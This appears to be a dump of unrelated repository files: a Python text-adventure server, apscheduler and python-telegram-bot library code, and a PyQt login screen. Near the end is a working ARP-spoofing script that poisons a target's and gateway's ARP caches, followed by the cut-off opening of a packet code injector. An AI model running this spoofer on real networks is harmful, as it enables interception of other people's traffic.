SYSTEM_ACTION = auto()
TRAVEL_ACTION = auto()
INFO_REQUEST = auto()
COMMAND_NOT = -1
class SystemAction(Enum):
SYS_SAY = auto()
SYS_QUIT = auto()
SYS_NOT = auto()
class RoomChange(Enum):
ROOM_ADD = auto()
ROOM_REMOVE = auto()
ROOM_SET_NAME = auto()
ROOM_SET_DESC = auto()
ROOM_SET_FLAG = auto()
ROOM_SET_EXIT = auto()
ROOM_SET_NOT = auto()
class InfoRequest(Enum):
INFO_ROOM = auto()
INFO_PLAYERS = auto()
INFO_MAP = auto()
INFO_COMMANDS = auto()
INFO_NOT = auto()
class TravelAction(Enum):
TRAVEL_GOTO = auto()
TRAVEL_SWAP = auto()
TRAVEL_NOT = auto()
class Command:
type = CommandTypes.COMMAND_NOT
subtype = CommandTypes.COMMAND_NOT
@staticmethod
def getCompleteList():
return {
CommandTypes.MOVEMENT:
{"north": Movement.DIR_NORTH, "n": Movement.DIR_NORTH,
"east": Movement.DIR_EAST, "e": Movement.DIR_EAST,
"south": Movement.DIR_SOUTH, "s": Movement.DIR_SOUTH,
"west": Movement.DIR_WEST, "w": Movement.DIR_WEST,
"up": Movement.DIR_UP, "u": Movement.DIR_UP,
"down": Movement.DIR_DOWN, "d": Movement.DIR_DOWN,
"northeast": Movement.DIR_NORTHEAST,
"ne": Movement.DIR_NORTHEAST,
"southeast": Movement.DIR_SOUTHEAST,
"se": Movement.DIR_SOUTHEAST,
"southwest": Movement.DIR_SOUTHWEST,
"sw": Movement.DIR_SOUTHWEST,
"northwest": Movement.DIR_NORTHWEST,
"nw": Movement.DIR_NORTHWEST},
CommandTypes.SYSTEM_ACTION:
{"say": SystemAction.SYS_SAY,
"quit": SystemAction.SYS_QUIT},
CommandTypes.INFO_REQUEST:
{"look": InfoRequest.INFO_ROOM, "l": InfoRequest.INFO_ROOM,
"players": InfoRequest.INFO_PLAYERS,
"map": InfoRequest.INFO_MAP,
"commands": InfoRequest.INFO_COMMANDS,
"?": InfoRequest.INFO_COMMANDS,
"help": InfoRequest.INFO_COMMANDS},
CommandTypes.ROOM_CHANGE:
{"mkroom": RoomChange.ROOM_ADD,
"rmroom": RoomChange.ROOM_REMOVE,
"setrname": RoomChange.ROOM_SET_NAME,
"setrdesc": RoomChange.ROOM_SET_DESC,
"setrexit": RoomChange.ROOM_SET_EXIT,
"setrflag": RoomChange.ROOM_SET_FLAG},
CommandTypes.TRAVEL_ACTION:
{"goto": TravelAction.TRAVEL_GOTO,
"swap": TravelAction.TRAVEL_SWAP}
}
def get_all_commands_as_strings():
stringList = []
commandList = Command.getCompleteList()
for commandType in list(commandList):
stringList.append(list(commandList[commandType]))
print("commands: " + str(stringList))
return stringList
def is_actual_direction(direction, check):
return direction == check or direction == (check + 1)
```
#### File: src/io/OutgoingHandler.py
```python
from src.io.CommandInterpreter import InfoRequest
from src.io.IODefs import IODefs
from src.io.OutputBuilder import print_room_to_player, print_to_player, PrintArg
from src.rooms.RoomCRUD import lookup_room
def outgoing_handler(player):
expected = buffer_pos = 0
if (1 + len(player.buffer)) <= IODefs.PRINT_LINE_WIDTH.value:
# TODO: prompt chars again
# expected += add_prompt_chars(player)
return send_and_handle_errors(player, expected)
lines_required = get_buffer_split_by_line_width(player.buffer) + num_of_newlines(player)
processedBuf = ''
for i in range(0, lines_required):
stop_at_char = find_reasonable_line_end(player, buffer_pos)
processedBuf = player.buffer[buffer_pos:stop_at_char]
processedBuf += "\n"
buffer_pos += stop_at_char + 1
if buffer_pos >= expected:
break
if processedBuf.rfind("\n") != len(processedBuf):
processedBuf += "\n"
player.buffer = processedBuf
return send_and_handle_errors(player, expected)
def num_of_newlines(player):
newlines = 0
for i in range(0, len(player.buffer)):
if player.buffer[i] == '\n':
newlines += 1
return newlines
def find_reasonable_line_end(player, buffer_pos):
"""Find the last space or newline in the next LINE_WIDTH chars"""
line_width_val = IODefs.PRINT_LINE_WIDTH.value
substr = player.buffer[buffer_pos:(buffer_pos + line_width_val)]
print("find line end in: " + substr)
if len(substr) < line_width_val:
return len(substr)
last_value = len(substr)
find_match = substr.rfind(" ")
if find_match is not -1:
last_value = find_match
find_match = substr.rfind("\n")
if find_match is not -1:
last_value = find_match
if (float((last_value / line_width_val) * 100)) < 70:
return line_width_val
print("last value: " + last_value)
return last_value
def get_buffer_split_by_line_width(expected):
lines = float(expected / IODefs.PRINT_LINE_WIDTH.value)
if not lines.is_integer():
lines += 1
return lines
def send_and_handle_errors(player, expected):
returned = total = 0
while returned < expected:
returned = player.socket_num.send(player.buffer[total])
if returned == 0:
player.buffer = ''
return 1
player.buffer = ''
return 0
```
#### File: src/items/Inventory.py
```python
class Inventory:
itemCount = 0
def __init__(self):
print("")
class Object:
id = 0
name = ''
description = ''
keywords = ''
weight = ''
def get_new_player_inventory(socket):
# yo
hi = 0
```
#### File: src/players/PlayerMovement.py
```python
from src.io.CommandInterpreter import Command, Movement, TravelAction, \
CommandTypes
from src.io.OutputBuilder import print_to_player, PrintArg, print_room_to_player
from src.rooms.RoomCRUD import lookup_room, lookup_room_exits
from src.rooms.RoomClasses import Direction, Coordinates
from src.sqlitehelper import SQLiteHelper
def calc_coords_from_playerloc_and_dir(player):
if player.store is None:
player.coords.x = player.coords.y = player.coords.z = -1
return
info = Command()
info.type = CommandTypes.COMMAND_NOT
info.subtype = CommandTypes.COMMAND_NOT
coords = Coordinates()
coords.x += x_movement_to_vector(info)
coords.y += y_movement_to_vector(info)
coords.z += z_movement_to_vector(info)
return coords
def x_movement_to_vector(info):
if any(info.subtype in i for i in (Direction.DIR_EAST,
Direction.DIR_NORTHEAST,
Direction.DIR_SOUTHEAST)):
return 1
elif any(info.subtype in i for i in (Direction.DIR_SOUTHWEST,
Direction.DIR_NORTHWEST,
Direction.DIR_WEST)):
return -1
return 0
def y_movement_to_vector(info):
if any(info.subtype in i for i in (Direction.DIR_NORTH,
Direction.DIR_NORTHEAST,
Direction.DIR_NORTHWEST)):
return 1
elif any(info.subtype in i for i in (Direction.DIR_SOUTHEAST,
Direction.DIR_SOUTHWEST,
Direction.DIR_SOUTH)):
return -1
return 0
def z_movement_to_vector(info):
if info.subtype == Direction.DIR_UP:
return 1
elif info.subtype == Direction.DIR_DOWN:
return -1
return 0
def do_movement_cmd(player, info):
direction = Movement.DIR_NOT
origin = player.coords
destination = {0}
if info.subtype == Movement.DIR_NORTH:
direction = Movement.DIR_NORTH
destination.y = origin.y + 1
elif info.subtype == Movement.DIR_EAST:
direction = Movement.DIR_EAST
destination.x = origin.x + 1
elif info.subtype == Movement.DIR_SOUTH:
direction = Movement.DIR_SOUTH
destination.y = origin.y - 1
elif info.subtype == Movement.DIR_WEST:
direction = Movement.DIR_WEST
destination.x = origin.x - 1
elif info.subtype == Movement.DIR_DOWN:
direction = Movement.DIR_DOWN
destination.z = origin.z - 1
elif info.subtype == Movement.DIR_UP:
direction = Movement.DIR_UP
destination.z = origin.z + 1
elif info.subtype == Movement.DIR_NORTHWEST:
direction = Movement.DIR_NORTHWEST
destination.x = origin.x - 1
destination.y = origin.y + 1
elif info.subtype == Movement.DIR_NORTHEAST:
direction = Movement.DIR_NORTHEAST
destination.x = origin.x + 1
destination.y = origin.y + 1
elif info.subtype == Movement.DIR_SOUTHWEST:
direction = Movement.DIR_SOUTHWEST
destination.x = origin.x - 1
destination.y = origin.y - 1
elif info.subtype == Movement.DIR_SOUTHEAST:
direction = Movement.DIR_SOUTHEAST
destination.x = origin.x + 1
destination.y = origin.y - 1
dest_room = lookup_room(destination)
if dest_room is None:
print("oh no")
# do something
rv = lookup_room_exits(origin, dest_room)
if rv == -1:
print_to_player(player, PrintArg.PRINT_INVAL_DIR)
return
elif rv == -2:
# send them back to origin room, somewhere they shouldn't be
destination.x = 0
destination.y = 0
destination.z = 0
print_to_player(player, PrintArg.PRINT_INVAL_DIR)
# check me
else:
print_to_player(player, direction)
adjust_player_location(player, dest_room.id)
print_room_to_player(player, dest_room)
def do_travel_cmd(player, info):
if info.subtype == TravelAction.TRAVEL_GOTO:
print("ADD ME %d\n", player.socket_num)
if info.subtype == TravelAction.TRAVEL_SWAP:
print("ADD ME %d\n", player.socket_num)
def adjust_player_location(player, room_id):
return SQLiteHelper.SQLExecution(
"UPDATE PLAYERS SET loc_id =:room_id WHERE name =:pname",
{"loc_id": room_id, "name": player.name},
SQLiteHelper.DBTypes.PLAYER_DB)
``` |
{
"source": "0xtuytuy/unit-crypto-ski-week-poap-bot",
"score": 2
} |
#### File: apscheduler/executors/debug.py
```python
import sys
from apscheduler.executors.base import BaseExecutor, run_job
class DebugExecutor(BaseExecutor):
"""
A special executor that executes the target callable directly instead of deferring it to a
thread or process.
Plugin alias: ``debug``
"""
def _do_submit_job(self, job, run_times):
try:
events = run_job(job, job._jobstore_alias, run_times, self._logger.name)
except BaseException:
self._run_job_error(job.id, *sys.exc_info()[1:])
else:
self._run_job_success(job.id, events)
```
#### File: apscheduler/schedulers/twisted.py
```python
from __future__ import absolute_import
from functools import wraps
from apscheduler.schedulers.base import BaseScheduler
from apscheduler.util import maybe_ref
try:
from twisted.internet import reactor as default_reactor
except ImportError: # pragma: nocover
raise ImportError('TwistedScheduler requires Twisted installed')
def run_in_reactor(func):
@wraps(func)
def wrapper(self, *args, **kwargs):
self._reactor.callFromThread(func, self, *args, **kwargs)
return wrapper
class TwistedScheduler(BaseScheduler):
"""
A scheduler that runs on a Twisted reactor.
Extra options:
=========== ========================================================
``reactor`` Reactor instance to use (defaults to the global reactor)
=========== ========================================================
"""
_reactor = None
_delayedcall = None
def _configure(self, config):
self._reactor = maybe_ref(config.pop('reactor', default_reactor))
super(TwistedScheduler, self)._configure(config)
@run_in_reactor
def shutdown(self, wait=True):
super(TwistedScheduler, self).shutdown(wait)
self._stop_timer()
def _start_timer(self, wait_seconds):
self._stop_timer()
if wait_seconds is not None:
self._delayedcall = self._reactor.callLater(wait_seconds, self.wakeup)
def _stop_timer(self):
if self._delayedcall and self._delayedcall.active():
self._delayedcall.cancel()
del self._delayedcall
@run_in_reactor
def wakeup(self):
self._stop_timer()
wait_seconds = self._process_jobs()
self._start_timer(wait_seconds)
def _create_default_executor(self):
from apscheduler.executors.twisted import TwistedExecutor
return TwistedExecutor()
```
#### File: telegram/ext/commandhandler.py
```python
import re
import warnings
from typing import TYPE_CHECKING, Callable, Dict, List, Optional, Tuple, TypeVar, Union
from telegram import MessageEntity, Update
from telegram.ext import BaseFilter, Filters
from telegram.utils.deprecate import TelegramDeprecationWarning
from telegram.utils.types import SLT
from telegram.utils.helpers import DefaultValue, DEFAULT_FALSE
from .utils.types import CCT
from .handler import Handler
if TYPE_CHECKING:
from telegram.ext import Dispatcher
RT = TypeVar('RT')
class CommandHandler(Handler[Update, CCT]):
"""Handler class to handle Telegram commands.
Commands are Telegram messages that start with ``/``, optionally followed by an ``@`` and the
bot's name and/or some additional text. The handler will add a ``list`` to the
:class:`CallbackContext` named :attr:`CallbackContext.args`. It will contain a list of strings,
which is the text following the command split on single or consecutive whitespace characters.
By default the handler listens to messages as well as edited messages. To change this behavior
use ``~Filters.update.edited_message`` in the filter argument.
Note:
* :class:`CommandHandler` does *not* handle (edited) channel posts.
* :attr:`pass_user_data` and :attr:`pass_chat_data` determine whether a :obj:`dict` you
can use to keep any data in will be sent to the :attr:`callback` function. Related to
either the user or the chat that the update was sent in. For each update from the same
user or in the same chat, it will be the same :obj:`dict`.
Note that this is DEPRECATED, and you should use context based callbacks. See
https://git.io/fxJuV for more info.
Warning:
When setting ``run_async`` to :obj:`True`, you cannot rely on adding custom
attributes to :class:`telegram.ext.CallbackContext`. See its docs for more info.
Args:
command (:class:`telegram.utils.types.SLT[str]`):
The command or list of commands this handler should listen for.
Limitations are the same as described here https://core.telegram.org/bots#commands
callback (:obj:`callable`): The callback function for this handler. Will be called when
:attr:`check_update` has determined that an update should be processed by this handler.
Callback signature for context based API:
``def callback(update: Update, context: CallbackContext)``
The return value of the callback is usually ignored except for the special case of
:class:`telegram.ext.ConversationHandler`.
filters (:class:`telegram.ext.BaseFilter`, optional): A filter inheriting from
:class:`telegram.ext.filters.BaseFilter`. Standard filters can be found in
:class:`telegram.ext.filters.Filters`. Filters can be combined using bitwise
operators (& for and, | for or, ~ for not).
allow_edited (:obj:`bool`, optional): Determines whether the handler should also accept
edited messages. Default is :obj:`False`.
DEPRECATED: Edited is allowed by default. To change this behavior use
``~Filters.update.edited_message``.
pass_args (:obj:`bool`, optional): Determines whether the handler should be passed the
arguments passed to the command as a keyword argument called ``args``. It will contain
a list of strings, which is the text following the command split on single or
consecutive whitespace characters. Default is :obj:`False`
DEPRECATED: Please switch to context based callbacks.
pass_update_queue (:obj:`bool`, optional): If set to :obj:`True`, a keyword argument called
``update_queue`` will be passed to the callback function. It will be the ``Queue``
instance used by the :class:`telegram.ext.Updater` and :class:`telegram.ext.Dispatcher`
that contains new updates which can be used to insert updates. Default is :obj:`False`.
DEPRECATED: Please switch to context based callbacks.
pass_job_queue (:obj:`bool`, optional): If set to :obj:`True`, a keyword argument called
``job_queue`` will be passed to the callback function. It will be a
:class:`telegram.ext.JobQueue` instance created by the :class:`telegram.ext.Updater`
which can be used to schedule new jobs. Default is :obj:`False`.
DEPRECATED: Please switch to context based callbacks.
pass_user_data (:obj:`bool`, optional): If set to :obj:`True`, a keyword argument called
``user_data`` will be passed to the callback function. Default is :obj:`False`.
DEPRECATED: Please switch to context based callbacks.
pass_chat_data (:obj:`bool`, optional): If set to :obj:`True`, a keyword argument called
``chat_data`` will be passed to the callback function. Default is :obj:`False`.
DEPRECATED: Please switch to context based callbacks.
run_async (:obj:`bool`): Determines whether the callback will run asynchronously.
Defaults to :obj:`False`.
Raises:
ValueError: when command is too long or has illegal chars.
Attributes:
command (:class:`telegram.utils.types.SLT[str]`):
The command or list of commands this handler should listen for.
Limitations are the same as described here https://core.telegram.org/bots#commands
callback (:obj:`callable`): The callback function for this handler.
filters (:class:`telegram.ext.BaseFilter`): Optional. Only allow updates with these
Filters.
allow_edited (:obj:`bool`): Determines whether the handler should also accept
edited messages.
pass_args (:obj:`bool`): Determines whether the handler should be passed
``args``.
pass_update_queue (:obj:`bool`): Determines whether ``update_queue`` will be
passed to the callback function.
pass_job_queue (:obj:`bool`): Determines whether ``job_queue`` will be passed to
the callback function.
pass_user_data (:obj:`bool`): Determines whether ``user_data`` will be passed to
the callback function.
pass_chat_data (:obj:`bool`): Determines whether ``chat_data`` will be passed to
the callback function.
run_async (:obj:`bool`): Determines whether the callback will run asynchronously.
"""
__slots__ = ('command', 'filters', 'pass_args')
def __init__(
self,
command: SLT[str],
callback: Callable[[Update, CCT], RT],
filters: BaseFilter = None,
allow_edited: bool = None,
pass_args: bool = False,
pass_update_queue: bool = False,
pass_job_queue: bool = False,
pass_user_data: bool = False,
pass_chat_data: bool = False,
run_async: Union[bool, DefaultValue] = DEFAULT_FALSE,
):
super().__init__(
callback,
pass_update_queue=pass_update_queue,
pass_job_queue=pass_job_queue,
pass_user_data=pass_user_data,
pass_chat_data=pass_chat_data,
run_async=run_async,
)
if isinstance(command, str):
self.command = [command.lower()]
else:
self.command = [x.lower() for x in command]
for comm in self.command:
if not re.match(r'^[\da-z_]{1,32}$', comm):
raise ValueError('Command is not a valid bot command')
if filters:
self.filters = Filters.update.messages & filters
else:
self.filters = Filters.update.messages
if allow_edited is not None:
warnings.warn(
'allow_edited is deprecated. See https://git.io/fxJuV for more info',
TelegramDeprecationWarning,
stacklevel=2,
)
if not allow_edited:
self.filters &= ~Filters.update.edited_message
self.pass_args = pass_args
def check_update(
self, update: object
) -> Optional[Union[bool, Tuple[List[str], Optional[Union[bool, Dict]]]]]:
"""Determines whether an update should be passed to this handlers :attr:`callback`.
Args:
update (:class:`telegram.Update` | :obj:`object`): Incoming update.
Returns:
:obj:`list`: The list of args for the handler.
"""
if isinstance(update, Update) and update.effective_message:
message = update.effective_message
if (
message.entities
and message.entities[0].type == MessageEntity.BOT_COMMAND
and message.entities[0].offset == 0
and message.text
and message.bot
):
command = message.text[1 : message.entities[0].length]
args = message.text.split()[1:]
command_parts = command.split('@')
command_parts.append(message.bot.username)
if not (
command_parts[0].lower() in self.command
and command_parts[1].lower() == message.bot.username.lower()
):
return None
filter_result = self.filters(update)
if filter_result:
return args, filter_result
return False
return None
def collect_optional_args(
self,
dispatcher: 'Dispatcher',
update: Update = None,
check_result: Optional[Union[bool, Tuple[List[str], Optional[bool]]]] = None,
) -> Dict[str, object]:
"""Provide text after the command to the callback the ``args`` argument as list, split on
single whitespaces.
"""
optional_args = super().collect_optional_args(dispatcher, update)
if self.pass_args and isinstance(check_result, tuple):
optional_args['args'] = check_result[0]
return optional_args
def collect_additional_context(
self,
context: CCT,
update: Update,
dispatcher: 'Dispatcher',
check_result: Optional[Union[bool, Tuple[List[str], Optional[bool]]]],
) -> None:
"""Add text after the command to :attr:`CallbackContext.args` as list, split on single
whitespaces and add output of data filters to :attr:`CallbackContext` as well.
"""
if isinstance(check_result, tuple):
context.args = check_result[0]
if isinstance(check_result[1], dict):
context.update(check_result[1])
class PrefixHandler(CommandHandler):
"""Handler class to handle custom prefix commands.
This is a intermediate handler between :class:`MessageHandler` and :class:`CommandHandler`.
It supports configurable commands with the same options as CommandHandler. It will respond to
every combination of :attr:`prefix` and :attr:`command`. It will add a ``list`` to the
:class:`CallbackContext` named :attr:`CallbackContext.args`. It will contain a list of strings,
which is the text following the command split on single or consecutive whitespace characters.
Examples:
Single prefix and command:
.. code:: python
PrefixHandler('!', 'test', callback) # will respond to '!test'.
Multiple prefixes, single command:
.. code:: python
PrefixHandler(['!', '#'], 'test', callback) # will respond to '!test' and '#test'.
Multiple prefixes and commands:
.. code:: python
PrefixHandler(['!', '#'], ['test', 'help'], callback) # will respond to '!test', \
'#test', '!help' and '#help'.
By default the handler listens to messages as well as edited messages. To change this behavior
use ``~Filters.update.edited_message``.
Note:
* :class:`PrefixHandler` does *not* handle (edited) channel posts.
* :attr:`pass_user_data` and :attr:`pass_chat_data` determine whether a :obj:`dict` you
can use to keep any data in will be sent to the :attr:`callback` function. Related to
either the user or the chat that the update was sent in. For each update from the same
user or in the same chat, it will be the same :obj:`dict`.
Note that this is DEPRECATED, and you should use context based callbacks. See
https://git.io/fxJuV for more info.
Warning:
When setting ``run_async`` to :obj:`True`, you cannot rely on adding custom
attributes to :class:`telegram.ext.CallbackContext`. See its docs for more info.
Args:
prefix (:class:`telegram.utils.types.SLT[str]`):
The prefix(es) that will precede :attr:`command`.
command (:class:`telegram.utils.types.SLT[str]`):
The command or list of commands this handler should listen for.
callback (:obj:`callable`): The callback function for this handler. Will be called when
:attr:`check_update` has determined that an update should be processed by this handler.
Callback signature for context based API:
``def callback(update: Update, context: CallbackContext)``
The return value of the callback is usually ignored except for the special case of
:class:`telegram.ext.ConversationHandler`.
filters (:class:`telegram.ext.BaseFilter`, optional): A filter inheriting from
:class:`telegram.ext.filters.BaseFilter`. Standard filters can be found in
:class:`telegram.ext.filters.Filters`. Filters can be combined using bitwise
operators (& for and, | for or, ~ for not).
pass_args (:obj:`bool`, optional): Determines whether the handler should be passed the
arguments passed to the command as a keyword argument called ``args``. It will contain
a list of strings, which is the text following the command split on single or
consecutive whitespace characters. Default is :obj:`False`
DEPRECATED: Please switch to context based callbacks.
pass_update_queue (:obj:`bool`, optional): If set to :obj:`True`, a keyword argument called
``update_queue`` will be passed to the callback function. It will be the ``Queue``
instance used by the :class:`telegram.ext.Updater` and :class:`telegram.ext.Dispatcher`
that contains new updates which can be used to insert updates. Default is :obj:`False`.
DEPRECATED: Please switch to context based callbacks.
pass_job_queue (:obj:`bool`, optional): If set to :obj:`True`, a keyword argument called
``job_queue`` will be passed to the callback function. It will be a
:class:`telegram.ext.JobQueue` instance created by the :class:`telegram.ext.Updater`
which can be used to schedule new jobs. Default is :obj:`False`.
DEPRECATED: Please switch to context based callbacks.
pass_user_data (:obj:`bool`, optional): If set to :obj:`True`, a keyword argument called
``user_data`` will be passed to the callback function. Default is :obj:`False`.
DEPRECATED: Please switch to context based callbacks.
pass_chat_data (:obj:`bool`, optional): If set to :obj:`True`, a keyword argument called
``chat_data`` will be passed to the callback function. Default is :obj:`False`.
DEPRECATED: Please switch to context based callbacks.
run_async (:obj:`bool`): Determines whether the callback will run asynchronously.
Defaults to :obj:`False`.
Attributes:
callback (:obj:`callable`): The callback function for this handler.
filters (:class:`telegram.ext.BaseFilter`): Optional. Only allow updates with these
Filters.
pass_args (:obj:`bool`): Determines whether the handler should be passed
``args``.
pass_update_queue (:obj:`bool`): Determines whether ``update_queue`` will be
passed to the callback function.
pass_job_queue (:obj:`bool`): Determines whether ``job_queue`` will be passed to
the callback function.
pass_user_data (:obj:`bool`): Determines whether ``user_data`` will be passed to
the callback function.
pass_chat_data (:obj:`bool`): Determines whether ``chat_data`` will be passed to
the callback function.
run_async (:obj:`bool`): Determines whether the callback will run asynchronously.
"""
# 'prefix' is a class property, & 'command' is included in the superclass, so they're left out.
__slots__ = ('_prefix', '_command', '_commands')
def __init__(
self,
prefix: SLT[str],
command: SLT[str],
callback: Callable[[Update, CCT], RT],
filters: BaseFilter = None,
pass_args: bool = False,
pass_update_queue: bool = False,
pass_job_queue: bool = False,
pass_user_data: bool = False,
pass_chat_data: bool = False,
run_async: Union[bool, DefaultValue] = DEFAULT_FALSE,
):
self._prefix: List[str] = []
self._command: List[str] = []
self._commands: List[str] = []
super().__init__(
'nocommand',
callback,
filters=filters,
allow_edited=None,
pass_args=pass_args,
pass_update_queue=pass_update_queue,
pass_job_queue=pass_job_queue,
pass_user_data=pass_user_data,
pass_chat_data=pass_chat_data,
run_async=run_async,
)
self.prefix = prefix # type: ignore[assignment]
self.command = command # type: ignore[assignment]
self._build_commands()
@property
def prefix(self) -> List[str]:
"""
The prefixes that will precede :attr:`command`.
Returns:
List[:obj:`str`]
"""
return self._prefix
@prefix.setter
def prefix(self, prefix: Union[str, List[str]]) -> None:
if isinstance(prefix, str):
self._prefix = [prefix.lower()]
else:
self._prefix = prefix
self._build_commands()
@property # type: ignore[override]
def command(self) -> List[str]: # type: ignore[override]
"""
The list of commands this handler should listen for.
Returns:
List[:obj:`str`]
"""
return self._command
@command.setter
def command(self, command: Union[str, List[str]]) -> None:
if isinstance(command, str):
self._command = [command.lower()]
else:
self._command = command
self._build_commands()
def _build_commands(self) -> None:
self._commands = [x.lower() + y.lower() for x in self.prefix for y in self.command]
def check_update(
self, update: object
) -> Optional[Union[bool, Tuple[List[str], Optional[Union[bool, Dict]]]]]:
"""Determines whether an update should be passed to this handlers :attr:`callback`.
Args:
update (:class:`telegram.Update` | :obj:`object`): Incoming update.
Returns:
:obj:`list`: The list of args for the handler.
"""
if isinstance(update, Update) and update.effective_message:
message = update.effective_message
if message.text:
text_list = message.text.split()
if text_list[0].lower() not in self._commands:
return None
filter_result = self.filters(update)
if filter_result:
return text_list[1:], filter_result
return False
return None
```
#### File: site-packages/telegram/forcereply.py
```python
from typing import Any
from telegram import ReplyMarkup
class ForceReply(ReplyMarkup):
"""
Upon receiving a message with this object, Telegram clients will display a reply interface to
the user (act as if the user has selected the bot's message and tapped 'Reply'). This can be
extremely useful if you want to create user-friendly step-by-step interfaces without having
to sacrifice privacy mode.
Objects of this class are comparable in terms of equality. Two objects of this class are
considered equal, if their :attr:`selective` is equal.
Args:
selective (:obj:`bool`, optional): Use this parameter if you want to force reply from
specific users only. Targets:
1) Users that are @mentioned in the :attr:`~telegram.Message.text` of the
:class:`telegram.Message` object.
2) If the bot's message is a reply (has ``reply_to_message_id``), sender of the
original message.
input_field_placeholder (:obj:`str`, optional): The placeholder to be shown in the input
field when the reply is active; 1-64 characters.
.. versionadded:: 13.7
**kwargs (:obj:`dict`): Arbitrary keyword arguments.
Attributes:
force_reply (:obj:`True`): Shows reply interface to the user, as if they manually selected
the bots message and tapped 'Reply'.
selective (:obj:`bool`): Optional. Force reply from specific users only.
input_field_placeholder (:obj:`str`): Optional. The placeholder shown in the input
field when the reply is active.
.. versionadded:: 13.7
"""
__slots__ = ('selective', 'force_reply', 'input_field_placeholder', '_id_attrs')
def __init__(
self,
force_reply: bool = True,
selective: bool = False,
input_field_placeholder: str = None,
**_kwargs: Any,
):
# Required
self.force_reply = bool(force_reply)
# Optionals
self.selective = bool(selective)
self.input_field_placeholder = input_field_placeholder
self._id_attrs = (self.selective,)
``` |
{
"source": "0xtz/pyplayer",
"score": 2
} |
#### File: 0xtz/pyplayer/main.py
```python
from index import MainWindow
from PyQt5.QtGui import *
from PyQt5.QtWidgets import *
from PyQt5.QtCore import *
from PyQt5 import QtMultimedia
from PyQt5.uic import *
import pyrebase
import sys
import os
# from main_ui import Ui_MainWindow
MainUI,_ = loadUiType('main.ui')
WINDOW_SIZE = 0
counter = 0
# firebase config
firebaseConfig = { # Pute your config from firebase website firebase.com ;)
"apiKey" : "",
"authDomain" : "",
"projectId" : "",
"databaseURL":"",
"storageBucket": "",
"messagingSenderId": "",
"appId": "",
"measurementId" : ""
}
firebase = pyrebase.initialize_app(firebaseConfig)
auth = firebase.auth()
CURRENT_DIR = os.path.dirname(os.path.realpath(__file__))
class Main(QMainWindow , MainUI):
def __init__(self , parent=None):
super(Main, self).__init__(parent)
QMainWindow.__init__(self)
self.setupUi(self)
self.ui()
self.btns()
def center(self):
qr = self.frameGeometry()
cp = QDesktopWidget().availableGeometry().center()
qr.moveCenter(cp)
self.move(qr.topLeft())
def mousePressEvent(self, event):
self.oldPos = event.globalPos()
def mouseMoveEvent(self, event):
delta = QPoint (event.globalPos() - self.oldPos)
self.move(self.x() + delta.x(), self.y() + delta.y())
self.oldPos = event.globalPos()
def ui(self):
self.setAttribute(Qt.WA_TranslucentBackground)
self.setWindowFlags(Qt.Window | Qt.CustomizeWindowHint)
self.frame_top_1.mouseMoveEvent = self.mouseMoveEvent
def btns(self):
# StackWidget
# {your QPushButton}.clicked.connect(lambda: {your QStackedWidget}.setCurrentWidget({another page}))
self.btn_togle.clicked.connect(lambda : self.stackedWidget.setCurrentWidget(self.pg_home))
self.btn_music.clicked.connect(lambda : self.stackedWidget.setCurrentWidget(self.pg_music))
self.btn_goto.clicked.connect(lambda : self.stackedWidget.setCurrentWidget(self.pg_music))
self.btn_music2.clicked.connect(lambda : self.stackedWidget.setCurrentWidget(self.pg_music))
self.btn_go_to_setting.clicked.connect(lambda : self.stackedWidget.setCurrentWidget(self.pg_setting))
self.btn_minimize.clicked.connect(lambda: self.showMinimized() )
self.btn_close.clicked.connect(self.close)
# Restore or maximize your window
def restore_or_maximize_window(self):
# Global windows state
global WINDOW_SIZE
win_status = WINDOW_SIZE
if win_status == 0:
# If the window is not maximized
WINDOW_SIZE = 1
self.showMaximized()
else:
# If the window is on its default size
WINDOW_SIZE = 0
self.showNormal()
# login SCREEN
Mainui,_ = loadUiType('login.ui')
class Login(QMainWindow, Mainui):
def __init__(self , parent=None):
super(Login, self).__init__(parent)
QMainWindow.__init__(self)
self.setupUi(self)
self.ui()
self.btns()
def btns(self):
self.btn_exit.clicked.connect(self.close)
self.btn_to_create.clicked.connect(lambda : self.stackedWidget.setCurrentWidget(self.pg_create))
self.go_to_login.clicked.connect(lambda : self.stackedWidget.setCurrentWidget(self.pg_login ))
self.btn_login.clicked.connect(self.loginfunction)
self.btn_creat.clicked.connect(self.create_account)
def ui(self):
qr = self.frameGeometry()
cp = QDesktopWidget().availableGeometry().center()
qr.moveCenter(cp)
self.move(qr.topLeft())
self.setAttribute(Qt.WA_TranslucentBackground)
self.setWindowFlags(Qt.Window | Qt.CustomizeWindowHint)
self.invalid.setVisible(False)
self.invalid1.setVisible(False)
def loginfunction(self):
email = self.login_user.text()
password = self.login_passwd.text()
try:
auth.sign_in_with_email_and_password(email,password)
main_win = Main()
self.close()
main_win.show()
except:
self.invalid.setVisible(True)
def create_account(self):
if self.creat_passwd1.text() == self.creat_passwd2.text() and self.creat_user.text() != "":
password = <PASSWORD>()
mail = self.creat_user.text()
try:
auth.create_user_with_email_and_password(mail, password)
lambda : self.stackedWidget.setCurrentWidget(self.pg_login)
except:
self.invalid.setVisible(True)
def main():
app = QApplication(sys.argv)
window = Login()
window.show()
app.exec_()
if __name__ == '__main__':
main()
``` |
{
"source": "0xUvaish/ARP-Spoofer",
"score": 3
} |
#### File: 0xUvaish/ARP-Spoofer/arpspoof1.py
```python
import scapy.all as scapy
import time
def get_mac(ip):
arp_request = scapy.ARP(pdst=ip)
broadcast = scapy.Ether(dst="ff:ff:ff:ff:ff:ff")
arp_request_broadcast = broadcast/arp_request
answered_list = scapy.srp(arp_request_broadcast, verbose=False)[0]
return answered_list[0][1].hwsrc
def spoof(target_ip, spoof_ip):
target_mac = get_mac(target_ip)
packet = scapy.ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=spoof_ip)
scapy.send(packet, verbose=False)
def restore(destination_ip, source_ip):
destination_mac = get_mac(destination_ip)
source_mac = get_mac(source_ip)
packet = scapy.ARP(op=2, pdst=destination_ip, hwdst=destination_mac, psrc=source_ip, hwsrc=source_mac)
scapy.send(packet, count=4, verbose=False)
target_ip = "192.168.1.121"
gateway_ip = "192.168.1.103"
try:
sent_packets_count = 0
while True:
spoof(target_ip, gateway_ip)
spoof(gateway_ip, target_ip)
sent_packets_count = sent_packets_count + 2
print("\r[+] Packets sent: " + str(sent_packets_count), end="")
time.sleep(2)
except KeyboardInterrupt:
print("\n[-] Detected CTRL + C ... Resetting ARP tables..... Please wait.\n")
restore(target_ip, gateway_ip)
restore(gateway_ip, target_ip)
print("[✓] Restored successfully")
``` |
{
"source": "0xUvaish/Code-Injector",
"score": 3
} |
#### File: 0xUvaish/Code-Injector/code_injector1.py
```python
import scapy.all as scapy
import netfilterqueue
import re
def set_load(packet, load):
